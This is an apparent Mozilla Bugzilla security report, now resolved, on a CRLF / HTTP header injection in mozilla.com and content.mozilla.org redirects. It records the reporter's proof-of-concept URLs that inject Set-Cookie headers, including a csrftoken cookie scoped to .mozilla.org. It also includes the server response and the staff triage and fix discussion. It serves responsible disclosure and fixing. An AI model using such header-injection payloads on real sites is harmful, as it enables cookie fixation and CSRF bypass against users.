Closed
Bug 1280116
Opened 8 years ago
Closed 8 years ago
[mozilla.com] [content.mozilla.org] CRLF / HTTP Header Injection
Categories
(www.mozilla.org :: Bedrock, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: blackfan, Unassigned)
References
()
Details
(Keywords: sec-moderate, wsec-http-header-inject, Whiteboard: [reporter-external] [web-bounty-form] [verif?])
PoC (any browser except FireFox): https://mozilla.com/%23%0dSet-Cookie:crlf=injection https://content.mozilla.org/%23%0dSet-Cookie:csrftoken=injection;domain=.mozilla.org; HTTP Response: HTTP/1.1 302 Moved Temporarily Content-Type: text/plain Date: Tue, 14 Jun 2016 20:19:55 GMT Location: https://www.mozilla.com//# <= injection \r Set-Cookie:crlf=injection This vulnerability could be used in combination with others. For example, XSS via Cookie or session fixation. Also, it can be used to bypass CSRF protection on Django web applications.
Flags: sec-bounty?
Reporter | ||
Updated•8 years ago
|
Comment 1•8 years ago
|
||
Somewhat limited by the maximum length of the overwritten header, this bug is very similar to other issues we've had just like it, such as bug 1229680 and bug 1229996.
Status: UNCONFIRMED → NEW
Component: Other → Bedrock
Ever confirmed: true
Keywords: sec-high,
wsec-http-header-inject
Product: Websites → www.mozilla.org
Summary: [mozilla.com] [content.mozilla.org] CRLF Injection → [mozilla.com] [content.mozilla.org] CRLF / HTTP Header Injection
Version: unspecified → Production
This was an especially difficult issue to confirm and fix, as the carriage returns screwed up most normal methods of inspection. Thank you for your report. We've altered the affected cluster to protect against the described attack and are working to resolve the underlying technical problem that led to this issue. I verified that Chrome is interpreting "One: Two\r\nThree: Four\rFive: Six\r\n" as three headers, rather than two headers, which does not match Firefox and libcurl's behavior. We strongly advise reporting this issue to the browser(s) you found to be affected, since that's a completely unexpected behavior to us, and permitted an unusual attack surface. Theoretically resolving as FIXED, but please feel free to REOPEN within the next week or two if you find any further issues with this specific attack vector.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Reporter | ||
Comment 3•8 years ago
|
||
Seems mozilla.com still vulnerable. https://mozilla.com/%0aSet-Cookie:crlf=injection >> unable to process paths containing %0D https://mozilla.com/%0dSet-Cookie:crlf=injection Location: https://www.mozilla.com//\r Set-Cookie:crlf=injection
Hrm. More testing, one moment.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Reporter | ||
Comment 6•8 years ago
|
||
Yes, now vuln fixed.
Okay. Thank you, again! You find the most interesting bugs with these things. Very appreciated. Please let us know if you file a bug with Chrome or any other browsers, so that we can find them from here.
Status: REOPENED → RESOLVED
Closed: 8 years ago → 8 years ago
Resolution: --- → FIXED
Comment 8•8 years ago
|
||
This is less severe than bug 1229680 since the direct XSS risk is not there. Cookie fixation attacks against mozilla.org are still a potential concern.
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high → sec-moderate
Updated•8 years ago
|
Group: websites-security
You need to log in
before you can comment on or make changes to this bug.
Description
•